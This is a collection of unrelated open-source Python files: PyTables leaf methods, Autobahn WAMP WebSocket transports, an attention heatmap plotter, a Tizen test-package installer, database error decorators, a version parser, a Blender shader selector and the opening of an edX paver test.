This method has the behavior described
in :meth:`Node._f_remove`. Please note that there is no recursive flag
since leaves do not have child nodes.
"""
self._f_remove(False)
def rename(self, newname):
"""Rename this node in place.
This method has the behavior described in :meth:`Node._f_rename()`.
"""
self._f_rename(newname)
def move( self, newparent=None, newname=None,
overwrite=False, createparents=False ):
"""Move or rename this node.
This method has the behavior described in :meth:`Node._f_move`
"""
self._f_move(newparent, newname, overwrite, createparents)
def copy( self, newparent=None, newname=None,
overwrite=False, createparents=False, **kwargs ):
"""Copy this node and return the new one.
This method has the behavior described in :meth:`Node._f_copy`. Please
note that there is no recursive flag since leaves do not have child
nodes.
.. warning::
Note that unknown parameters passed to this method will be
ignored, so may want to double check the spelling of these
(i.e. if you write them incorrectly, they will most probably
be ignored).
Parameters
----------
title
The new title for the destination. If omitted or None, the original
title is used.
filters : Filters
Specifying this parameter overrides the original filter properties
in the source node. If specified, it must be an instance of the
Filters class (see :ref:`FiltersClassDescr`). The default is to
copy the filter properties from the source node.
copyuserattrs
You can prevent the user attributes from being copied by setting
this parameter to False. The default is to copy them.
start, stop, step : int
Specify the range of rows to be copied; the default is to copy all
the rows.
stats
This argument may be used to collect statistics on the copy
process. When used, it should be a dictionary with keys 'groups',
'leaves' and 'bytes' having a numeric value. Their values will be
incremented to reflect the number of groups, leaves and bytes,
respectively, that have been copied during the operation.
chunkshape
The chunkshape of the new leaf. It supports a couple of special
values. A value of keep means that the chunkshape will be the same
than original leaf (this is the default). A value of auto means
that a new shape will be computed automatically in order to ensure
best performance when accessing the dataset through the main
dimension. Any other value should be an integer or a tuple
matching the dimensions of the leaf.
"""
return self._f_copy(
newparent, newname, overwrite, createparents, **kwargs )
def truncate(self, size):
"""Truncate the main dimension to be size rows.
If the main dimension previously was larger than this size, the extra
data is lost. If the main dimension previously was shorter, it is
extended, and the extended part is filled with the default values.
The truncation operation can only be applied to *enlargeable* datasets,
else a TypeError will be raised.
"""
# A non-enlargeable arrays (Array, CArray) cannot be truncated
if self.extdim < 0:
raise TypeError("non-enlargeable datasets cannot be truncated")
self._g_truncate(size)
def isVisible(self):
"""Is this node visible?
This method has the behavior described in :meth:`Node._f_isVisible()`.
"""
return self._f_isVisible()
# Attribute handling
# ``````````````````
def getAttr(self, name):
"""Get a PyTables attribute from this node.
This method has the behavior described in :meth:`Node._f_getAttr`.
"""
return self._f_getAttr(name)
def setAttr(self, name, value):
"""Set a PyTables attribute for this node.
This method has the behavior described in :meth:`Node._f_setAttr()`.
"""
self._f_setAttr(name, value)
def delAttr(self, name):
"""Delete a PyTables attribute from this node.
This method has the behavior described in :meth:`Node_f_delAttr`.
"""
self._f_delAttr(name)
# Data handling
# `````````````
def flush(self):
"""Flush pending data to disk.
Saves whatever remaining buffered data to disk. It also releases I/O
buffers, so if you are filling many datasets in the same PyTables
session, please call flush() extensively so as to help PyTables to keep
memory requirements low.
"""
self._g_flush()
def _f_close(self, flush=True):
"""Close this node in the tree.
This method has the behavior described in :meth:`Node._f_close`.
Besides that, the optional argument flush tells whether to flush
pending data to disk or not before closing.
"""
if not self._v_isopen:
return # the node is already closed or not initialized
# Only do a flush in case the leaf has an IO buffer. The
# internal buffers of HDF5 will be flushed afterwards during the
# self._g_close() call. Avoiding an unnecessary flush()
# operation accelerates the closing for the unbuffered leaves.
if flush and hasattr(self, "_v_iobuf"):
self.flush()
# Close the dataset and release resources
self._g_close()
# Close myself as a node.
super(Leaf, self)._f_close()
def close(self, flush=True):
"""Close this node in the tree.
This method is completely equivalent to :meth:`Leaf._f_close`.
"""
self._f_close(flush)
## Local Variables:
## mode: python
## py-indent-offset: 4
## tab-width: 4
## fill-column: 72
## End:
|
###############################################################################
##
## Copyright (C) 2013-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from __future__ import absolute_import
__all__= ['WampServerProtocol',
'WampClientProtocol',
'WampServerFactory',
'WampClientFactory']
from zope.interface import implementer
from twisted.python import log
from autobahn.websocket import protocol
from autobahn.websocket import http
from autobahn.wamp.interfaces import ITransport
from autobahn.wamp.exception import ProtocolError, SerializationError, TransportLost
@implementer(ITransport)
class WampWebSocketProtocol:
"""
Base class for WAMP-over-WebSocket transport mixins.
"""
def _bailout(self, code, reason):
if self.debug:
log.msg("Failing WAMP-over-WebSocket transport: code = {}, reason = '{}'".format(code, reason))
self.failConnection(code, reason)
def onOpen(self):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onOpen`
"""
## WebSocket connection established. Now let the user WAMP session factory
## create a new WAMP session and fire off session open callback.
try:
self._session = self.factory._factory()
self._session.onOpen(self)
except Exception as e:
## Exceptions raised in onOpen are fatal ..
reason = "WAMP Internal Error ({})".format(e)
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_INTERNAL_ERROR, reason = reason)
def onClose(self, wasClean, code, reason):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onClose`
"""
## WebSocket connection lost - fire off the WAMP
## session close callback
try:
if self.debug:
log.msg("WAMP-over-WebSocket transport lost: wasClean = {}, code = {}, reason = '{}'".format(wasClean, code, reason))
self._session.onClose(wasClean)
except Exception as e:
## silently ignore exceptions raised here ..
pass
self._session = None
def onMessage(self, payload, isBinary):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onMessage`
"""
try:
msg = self._serializer.unserialize(payload, isBinary)
self._session.onMessage(msg)
except ProtocolError as e:
reason = "WAMP Protocol Error ({})".format(e)
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason = reason)
except Exception as e:
reason = "WAMP Internal Error ({})".format(e)
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_INTERNAL_ERROR, reason = reason)
def send(self, msg):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.send`
"""
if self.isOpen():
try:
bytes, isBinary = self._serializer.serialize(msg)
except Exception as e:
## all exceptions raised from above should be serialization errors ..
raise SerializationError("Unable to serialize WAMP application payload ({})".format(e))
else:
self.sendMessage(bytes, isBinary)
else:
raise TransportLost()
def isOpen(self):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.isOpen`
"""
return self._session is not None
def close(self):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.close`
"""
if self.isOpen():
self.sendClose(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL)
else:
raise TransportLost()
def abort(self):
"""
Implements :func:`autobahn.wamp.interfaces.ITransport.abort`
"""
if self.isOpen():
self._bailout(protocol.WebSocketProtocol.CLOSE_STATUS_CODE_GOING_AWAY)
else:
raise TransportLost()
def parseSubprotocolIdentifier(subprotocol):
try:
s = subprotocol.split('.')
if s[0] != "wamp":
raise Exception("invalid protocol %s" % s[0])
version = int(s[1])
serializerId = s[2]
return version, serializerId
except:
return None, None
class WampWebSocketServerProtocol(WampWebSocketProtocol):
"""
Mixin for WAMP-over-WebSocket server transports.
"""
STRICT_PROTOCOL_NEGOTIATION = True
def onConnect(self, request):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onConnect`
"""
headers = {}
for subprotocol in request.protocols:
version, serializerId = parseSubprotocolIdentifier(subprotocol)
if version == 2 and serializerId in self.factory._serializers.keys():
self._serializer = self.factory._serializers[serializerId]
return subprotocol, headers
if self.STRICT_PROTOCOL_NEGOTIATION:
raise http.HttpException(http.BAD_REQUEST[0], "This server only speaks WebSocket subprotocols %s" % ', '.join(self.factory.protocols))
else:
## assume wamp.2.json
self._serializer = self.factory._serializers['json']
return None, headers
class WampWebSocketClientProtocol(WampWebSocketProtocol):
"""
Mixin for WAMP-over-WebSocket client transports.
"""
STRICT_PROTOCOL_NEGOTIATION = True
def onConnect(self, response):
"""
Callback from :func:`autobahn.websocket.interfaces.IWebSocketChannel.onConnect`
"""
if response.protocol not in self.factory.protocols:
if self.STRICT_PROTOCOL_NEGOTIATION:
raise Exception("Server does not speak any of the WebSocket subprotocols we requested (%s)." % ', '.join(self.factory.protocols))
else:
## assume wamp.2.json
serializerId = 'json'
else:
version, serializerId = parseSubprotocolIdentifier(response.protocol)
self._serializer = self.factory._serializers[serializerId]
class WampWebSocketFactory:
"""
Base class for WAMP-over-WebSocket transport factory mixins.
"""
def __init__(self, factory, serializers = None):
"""
:param factory: A callable that produces instances that implement
:class:`autobahn.wamp.interfaces.ITransportHandler`
:type factory: callable
:param serializers: A list of WAMP serializers to use (or None for default
serializers). Serializers must implement
:class:`autobahn.wamp.interfaces.ISerializer`.
type serializers: list
"""
assert(callable(factory))
self._factory = factory
if serializers is None:
serializers = []
## try MsgPack WAMP serializer
try:
from autobahn.wamp.serializer import MsgPackSerializer
serializers.append(MsgPackSerializer())
except ImportError:
pass
## try JSON WAMP serializer
try:
from autobahn.wamp.serializer import JsonSerializer
serializers.append(JsonSerializer())
except ImportError:
pass
if not serializers:
raise Exception("could not import any WAMP serializers")
self._serializers = {}
for ser in serializers:
self._serializers[ser.SERIALIZER_ID] = ser
self._protocols = ["wamp.2.%s" % ser.SERIALIZER_ID for ser in serializers]
class WampWebSocketServerFactory(WampWebSocketFactory):
"""
Mixin for WAMP-over-WebSocket server transport factories.
"""
class WampWebSocketClientFactory(WampWebSocketFactory):
"""
Mixin for WAMP-over-WebSocket client transport factories.
"""
|
import numpy
import matplotlib.pyplot as plt
import sys
import json
import argparse
# input:
# alignment matrix - numpy array
# shape (target tokens + eos, number of hidden source states = source tokens +eos)
# one line correpsonds to one decoding step producing one target token
# each line has the attention model weights corresponding to that decoding step
# each float on a line is the attention model weight for a corresponding source state.
# plot: a heat map of the alignment matrix
# x axis are the source tokens (alignment is to source hidden state that roughly corresponds to a source token)
# y axis are the target tokens
# http://stackoverflow.com/questions/14391959/heatmap-in-matplotlib-with-pcolor
def plot_head_map(mma, target_labels, source_labels):
fig, ax = plt.subplots()
heatmap = ax.pcolor(mma, cmap=plt.cm.Blues)
# put the major ticks at the middle of each cell
ax.set_xticks(numpy.arange(mma.shape[1])+0.5, minor=False)
ax.set_yticks(numpy.arange(mma.shape[0])+0.5, minor=False)
# without this I get some extra columns rows
# http://stackoverflow.com/questions/31601351/why-does-this-matplotlib-heatmap-have-an-extra-blank-column
ax.set_xlim(0, int(mma.shape[1]))
ax.set_ylim(0, int(mma.shape[0]))
# want a more natural, table-like display
ax.invert_yaxis()
ax.xaxis.tick_top()
# source words -> column labels
ax.set_xticklabels(source_labels, minor=False)
# target words -> row labels
ax.set_yticklabels(target_labels, minor=False)
plt.xticks(rotation=45)
#plt.tight_layout()
plt.show()
# column labels -> target words
# row labels -> source words
def read_alignment_matrix(f):
header = f.readline().strip().split('|||')
if header[0] == '':
return None, None, None, None
sid = int(header[0].strip())
# number of tokens in source and translation +1 for eos
src_count, trg_count = map(int,header[-1].split())
# source words
source_labels = header[3].decode('UTF-8').split()
source_labels.append('</s>')
# target words
target_labels = header[1].decode('UTF-8').split()
target_labels.append('</s>')
mm = []
for r in range(trg_count):
alignment = map(float,f.readline().strip().split())
mm.append(alignment)
mma = numpy.array(mm)
return sid,mma, target_labels, source_labels
def read_plot_alignment_matrices(f, n):
while(f):
sid, mma, target_labels, source_labels = read_alignment_matrix(f)
if mma is None:
return
if sid >n:
return
plot_head_map(mma, target_labels, source_labels)
# empty line separating the matrices
f.readline()
"""
Adding functions to read the json format.
"""
def read_plot_alignment_json(file, n):
while (file):
sid, mma, target_labels, source_labels = read_alignment_json(file)
if mma is None:
return
if sid > n:
return
plot_head_map(mma, target_labels, source_labels)
def read_alignment_json(file):
data = file.readline() ##one line containing the json object.
if len(data.strip()) == 0:
return None, None, None, None
jdata = json.loads(data)
## messy json encodings... TODO: make this better
jdata = json.loads(json.dumps(jdata).decode('unicode-escape').encode('utf8'))
#print jdata
sid = int(jdata["id"])
mma = numpy.array(jdata["matrix"])
##target words
target_labels = jdata["target_sent"].split()
target_labels.append('</s>')
##source words
source_labels = jdata["source_sent"].split()
source_labels.append('</s>')
return sid,mma, target_labels, source_labels
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# '/Users/mnadejde/Documents/workspace/MTMA2016/models/wmt16_systems/en-de/test.alignment'
parser.add_argument('--input', '-i', type=argparse.FileType('r'),
default='/Users/mnadejde/Documents/workspace/MTMA2016/models/wmt16_systems/ro-en/newstest2016-roen-src.ro.alignment', metavar='PATH',
help="Input file (default: standard input)")
parser.add_argument('--json', '-j', required = False,action="store_true",
help="If this option is used, then read alignment matrix from a Json formatted file.")
args = parser.parse_args()
if args.json:
read_plot_alignment_json(args.input, 10) ##n is the maximum number of sentences to process.
else:
read_plot_alignment_matrices(args.input,10)
>>>>>>> origin/nematus-liucan
|
#!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = "/home/app/content"
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code != None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user )
return doCMD(cmd)
def getPKGID(pkg_name=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
pkg_infos = line.split()
if len(pkg_infos) == 4:
continue
name = pkg_infos[5]
name = name.lstrip('[').rstrip(']')
print "name is: %s" % name
if pkg_name == name:
test_pkg_id = pkg_infos[3]
test_pkg_id = test_pkg_id.lstrip('[').rstrip(']')
print test_pkg_id
break
return test_pkg_id
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
if return_code != 0:
return True
else:
return False
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
action_status = True
(return_code, output) = doRemoteCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
if not doRemoteCopy(os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
action_status = False
(return_code, output) = doRemoteCMD(
"pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
for line in output:
if "Failure" in line:
action_status = False
break
for item in glob.glob("%s/*" % SCRIPT_DIR):
if item.endswith(".wgt"):
continue
elif item.endswith("inst.py"):
continue
else:
item_name = os.path.basename(item)
if not doRemoteCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
#if not doRemoteCopy(item, PKG_SRC_DIR):
action_status = False
for item in glob.glob("%s/xmlhttprequest/w3c/resources/cgi/*" % SCRIPT_DIR):
item_name = os.path.basename(item)
if not doRemoteCopy(item, "%s/xmlhttprequest/w3c/resources/%s" % (PKG_SRC_DIR, item_name)):
#if not doRemoteCopy(item, PKG_SRC_DIR):
action_status = False
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception, e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0 :
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket"%str(userid)
else:
print "[Error] cmd commands error : %s"%str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
|
import re
from gnue.common.apps.errors import UserError
class ErrorDecorators(object):
def decorateValueRequiredError(self, error, match):
return UserError(u_("The field '%s' is required. Please fill the field and try again") % match.groups()[0])
def decorateForceRollbackAndRetry(self, error, match):
print "! rollback forced via server error"
self.rollback()
return None # means to retry
def decorateSyntaxError(self, error, match):
return error
def decorateInternalError(self, error, match):
try:
s = match.groups()[0].decode('UTF-8')
except:
try:
s = match.groups()[0].decode('cp1251')
except:
s = repr(match.groups()[0])
return UserError(s)
def decorateUniqueConstraint(self, error, match):
return UserError(u_("Value already exists. Duplicate key value violates unique constraint '%s'") % match.groups()[0])
ERROR_DECORATORS = (
(
re.compile(r'IntegrityError\: null value in column \"(\w+)\" violates not\-null constraint'),
decorateValueRequiredError
),
(
re.compile(r'(?:ProgrammingError|InternalError)\: current transaction is aborted, commands ignored until end of transaction block'),
decorateForceRollbackAndRetry
),
(
re.compile(r'duplicate key value violates unique constraint "(\w+)"'),
decorateUniqueConstraint
),
#(
# re.compile(r'ProgrammingError\: syntax error at or near (.*)'),
# decorateSyntaxError
#),
(
re.compile(r'InternalError\: (.*)'),
decorateInternalError
),
)
def decorateError(self, error):
"""
This function used to make database related error user frielndly
"""
for pattern, decoratorFn in self.ERROR_DECORATORS:
match = pattern.search('%s: %s' % (error.__class__.__name__, str(error)))
if match:
error = decoratorFn(self, error, match)
break
return error
|
import re
def parse_version(version):
"""
Simplistic parser for setuptools_scm versions.
Supports final versions and alpha ('a'), beta ('b') and release candidate ('rc') versions.
It does not try to parse anything else than that, even if there is more in the version string.
Output is a version tuple containing integers. It ends with one or two elements that ensure that relational
operators yield correct relations for alpha, beta and rc versions, too.
For final versions the last element is a -1.
For prerelease versions the last two elements are a smaller negative number and the number of e.g. the beta.
This version format is part of the remote protocol, don‘t change in breaking ways.
"""
version_re = r"""
(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+) # version, e.g. 1.2.33
(?P<prerelease>(?P<ptype>a|b|rc)(?P<pnum>\d+))? # optional prerelease, e.g. a1 or b2 or rc33
"""
m = re.match(version_re, version, re.VERBOSE)
if m is None:
raise ValueError('Invalid version string %s' % version)
gd = m.groupdict()
version = [int(gd['major']), int(gd['minor']), int(gd['patch'])]
if m.lastgroup == 'prerelease':
p_type = {'a': -4, 'b': -3, 'rc': -2}[gd['ptype']]
p_num = int(gd['pnum'])
version += [p_type, p_num]
else:
version += [-1]
return tuple(version)
def format_version(version):
"""a reverse for parse_version (obviously without the dropped information)"""
f = []
it = iter(version)
while True:
part = next(it)
if part >= 0:
f += str(part)
elif part == -1:
break
else:
f[-1] = f[-1] + {-2: 'rc', -3: 'b', -4: 'a'}[part] + str(next(it))
break
return '.'.join(f)
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2015-2021: SCS Software
def get_shader(effect):
"""Gets class which represents shader for given effect inside "eut2" modules.
:param effect: full shader name without "eut2." prefix
:type effect: str
:return: corresponding class for given shader effect
:rtype: class
"""
if effect == "none":
from io_scs_tools.internals.shaders.eut2.none import NNone as Shader
elif effect == "water":
from io_scs_tools.internals.shaders.eut2.water import Water as Shader
elif effect == "window.lit":
from io_scs_tools.internals.shaders.eut2.window.lit import WindowLit as Shader
elif effect == "reflective":
from io_scs_tools.internals.shaders.eut2.reflective import Reflective as Shader
elif effect == "sign":
from io_scs_tools.internals.shaders.eut2.sign import Sign as Shader
elif effect == "grass":
from io_scs_tools.internals.shaders.eut2.grass import Grass as Shader
elif effect == "glass":
from io_scs_tools.internals.shaders.eut2.glass import Glass as Shader
elif effect == "mlaaweight":
from io_scs_tools.internals.shaders.eut2.mlaaweight import MlaaWeight as Shader
elif effect.startswith("fakeshadow"):
from io_scs_tools.internals.shaders.eut2.fakeshadow import Fakeshadow as Shader
elif effect.startswith("shadowonly"):
from io_scs_tools.internals.shaders.eut2.shadowonly import Shadowonly as Shader
elif effect.startswith("lightmap.night"):
from io_scs_tools.internals.shaders.eut2.lightmap.night import LightMapNight as Shader
elif effect.startswith("light.tex"):
from io_scs_tools.internals.shaders.eut2.light_tex import LightTex as Shader
elif effect.startswith("retroreflective"):
from io_scs_tools.internals.shaders.eut2.retroreflective import Retroreflective as Shader
elif effect.startswith("unlit.tex"):
from io_scs_tools.internals.shaders.eut2.unlit_tex import UnlitTex as Shader
elif effect.startswith("unlit.vcol.tex"):
from io_scs_tools.internals.shaders.eut2.unlit_vcol_tex import UnlitVcolTex as Shader
elif effect.startswith("truckpaint"):
if ".airbrush" in effect:
from io_scs_tools.internals.shaders.eut2.truckpaint.airbrush import TruckpaintAirbrush as Shader
elif ".colormask" in effect:
from io_scs_tools.internals.shaders.eut2.truckpaint.colormask import TruckpaintColormask as Shader
else:
from io_scs_tools.internals.shaders.eut2.truckpaint import Truckpaint as Shader
elif effect.startswith("lamp"):
if ".add.env" in effect:
from io_scs_tools.internals.shaders.eut2.lamp.add_env import LampAddEnv as Shader
else:
from io_scs_tools.internals.shaders.eut2.lamp import Lamp as Shader
elif effect.startswith("sky"):
from io_scs_tools.internals.shaders.eut2.sky import Sky as Shader
elif effect.startswith("shadowmap"):
from io_scs_tools.internals.shaders.eut2.shadowmap import Shadowmap as Shader
elif effect.startswith("flare"):
from io_scs_tools.internals.shaders.eut2.flare import Flare as Shader
elif effect.startswith("decalshadow"):
from io_scs_tools.internals.shaders.eut2.decalshadow import Decalshadow as Shader
elif effect.startswith("dif.spec.over.dif.opac"):
from io_scs_tools.internals.shaders.eut2.dif_spec_over_dif_opac import DifSpecOverDifOpac as Shader
elif effect.startswith("dif.spec.mult.dif.spec.iamod.dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec_mult_dif_spec_iamod_dif_spec import DifSpecMultDifSpecIamodDifSpec as Shader
elif effect.startswith("dif.spec.mult.dif.spec.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_mult_dif_spec.add_env import DifSpecMultDifSpecAddEnv as Shader
elif effect.startswith("dif.spec.mult.dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec_mult_dif_spec import DifSpecMultDifSpec as Shader
elif effect.startswith("dif.spec.add.env.nofresnel"):
from io_scs_tools.internals.shaders.eut2.dif_spec_add_env.nofresnel import DifSpecAddEnvNoFresnel as Shader
elif effect.startswith("building.add.env.day"):
from io_scs_tools.internals.shaders.eut2.building.add_env_day import BuildingAddEnvDay as Shader
elif effect.startswith("building.lvcol.day"):
from io_scs_tools.internals.shaders.eut2.building.lvcol_day import BuildingLvcolDay as Shader
elif effect.startswith("building.day"):
from io_scs_tools.internals.shaders.eut2.building.day import BuildingDay as Shader
elif effect.startswith("dif.weight.dif"):
from io_scs_tools.internals.shaders.eut2.dif_weight_dif import DifWeightDif as Shader
elif effect.startswith("dif.spec.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_add_env import DifSpecAddEnv as Shader
elif effect.startswith("dif.spec.fade.dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec_fade_dif_spec import DifSpecFadeDifSpec as Shader
elif effect.startswith("dif.spec.oclu.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_oclu_add_env import DifSpecOcluAddEnv as Shader
elif effect.startswith("dif.spec.oclu.weight.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_oclu_weight_add_env import DifSpecOcluWeightAddEnv as Shader
elif effect.startswith("dif.spec.weight.add.env"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_add_env import DifSpecWeightAddEnv as Shader
elif effect.startswith("dif.spec.weight.weight.dif.spec.weight"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_weight_dif_spec_weight import DifSpecWeightWeightDifSpecWeight as Shader
elif effect.startswith("dif.spec.weight.mult2.weight2"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_mult2_weight2 import DifSpecWeightMult2Weight2 as Shader
elif effect.startswith("dif.spec.weight.mult2"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight_mult2 import DifSpecWeightMult2 as Shader
elif effect.startswith("dif.spec.weight"):
from io_scs_tools.internals.shaders.eut2.dif_spec_weight import DifSpecWeight as Shader
elif effect.startswith("dif.spec.oclu"):
from io_scs_tools.internals.shaders.eut2.dif_spec_oclu import DifSpecOclu as Shader
elif effect.startswith("dif.spec"):
from io_scs_tools.internals.shaders.eut2.dif_spec import DifSpec as Shader
elif effect.startswith("dif.lum.spec"):
from io_scs_tools.internals.shaders.eut2.dif_lum_spec import DifLumSpec as Shader
elif effect.startswith("dif.lum"):
from io_scs_tools.internals.shaders.eut2.dif_lum import DifLum as Shader
elif effect.startswith("dif.anim"):
from io_scs_tools.internals.shaders.eut2.dif_anim import DifAnim as Shader
elif effect.startswith("dif"):
from io_scs_tools.internals.shaders.eut2.dif import Dif as Shader
else:
return None
return Shader
|
"""
Tests for the bok-choy paver commands themselves.
Run just this test with: paver test_lib -t pavelib/paver_tests/test_paver_bok_choy_cmds.py
"""
from __future__ import absolute_import
import os
import unittest
import six
if six.PY2:
from test.test_support import EnvironmentVarGuard
else:
from test.support import EnvironmentVarGuard # pylint: disable=import-error,no-name-in-module
from pavelib.utils.test.suites import BokChoyTestSuite
REPO_DIR = os.getcwd()
class TestPaverBokChoyCmd(unittest.TestCase):
"""
Paver Bok Choy Command test cases
"""
def _expected_command(self, name, store=None, verify_xss=True):
"""
Returns the command that is expected to be run for the given test spec
and store.
"""
shard_str = '/shard_' + self.shard if self.shard else ''
expected_statement = [
"DEFAULT_STORE={}".format(store),
"SCREENSHOT_DIR='{}/test_root/log{}'".format(REPO_DIR, shard_str),
"BOK_CHOY_HAR_DIR='{}/test_root/log{}/hars'".format(REPO_DIR, shard_str),
"BOKCHOY_A11Y_CUSTOM_RULES_FILE='{}/{}'".format(
REPO_DIR,
'node_modules/edx-custom-a11y-rules/lib/custom_a11y_rules.js'
),
"SELENIUM_DRIVER_LOG_DIR='{}/test_root/log{}'".format(REPO_DIR, shard_str),
"VERIFY_XSS='{}'".format(verify_xss),
"python",
"-Wd",
"-m",
"pytest",
"{}/common/test/acceptance/{}".format(REPO_DIR, name),
"--junitxml={}/reports/bok_choy{}/xunit.xml".format(REPO_DIR, shard_str),
"--verbose",
]
return expected_statement
def setUp(self):
super(TestPaverBokChoyCmd, self).setUp()
self.shard = os.environ.get('SHARD')
self.env_var_override = EnvironmentVarGuard()
def test_default(self):
